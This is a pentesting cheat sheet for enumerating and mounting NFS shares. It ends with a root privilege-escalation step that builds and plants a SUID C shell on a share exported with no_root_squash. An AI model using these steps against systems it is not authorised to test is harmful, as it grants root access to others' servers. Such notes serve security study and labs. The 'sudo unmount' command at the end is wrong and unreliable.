NFS (Network File System) Enumeration & Exploitation
Quick Summary
-
NFS allows systems (typically UNIX/Linux) to share directories/files over a network as if local.
-
Common ports:
111(RPCbind) and2049(NFS). -
Relies on RPC (ONC-RPC/SUN-RPC) and XDR for data formatting.
-
Authentication: Usually via UID/GID mapping, making it insecure on untrusted networks.
-
NFSv4+ improves security (Kerberos, ACLs, TCP-only, firewalls, stateful).
Service Discovery
sudo nmap -p111,2049 -sV -sC <target>
The above command is for NFS & RPC detection
showmount -e <target>
The above command lists the NFS shares.
sudo nmap -sV -p111,2049 --script=nfs* <target>
The above command is are Nmap NSE scripts for deeper enumeration.
Mounting a Discovered Share
mkdir -p /mnt/nfs
The above command creates a mount point
sudo mount -t nfs <target>:/ /mnt/nfs -o nolock
The above command mounts the share (no lock avoids file-locking errors).
ls -l /mnt/nfs
The above command shows username/groups.
ls -n /mnt/nfs
The above command shows UID/GID.
tree /mnt/nfs
The above command shows directory structure.
Dangerous NFS Export Options
| Option | Risk Description |
|---|---|
rw |
Writable share (modification possible). |
insecure |
Allows client ports >1024 (user-level access). |
no_root_squash |
Root on client = root on server. Exploitable! |
nohide |
Exports submounted FS without separate entries. |
🔧 Default Exports Configuration
cat /etc/exports
The above command views NFS exports.
echo '/mnt/nfs <target>/24(sync,no_subtree_check)' >> /etc/exports
exportfs -a
The above command applies changes.
systemctl restart nfs-kernel-server
The above command applies changes.
Privilege Escalation Tips
If no_root_squash is enabled:
echo -e '#include <stdlib.h>\nint main() { setuid(0); system("/bin/bash"); }' > shell.c
gcc shell.c -o shell
chmod +s shell
The three above commands create a SUID shell locally.
cp shell /mnt/nfs/
The above command copies the shell to the mounted NFS.
Unmount NFS
sudo unmount /mnt/nfs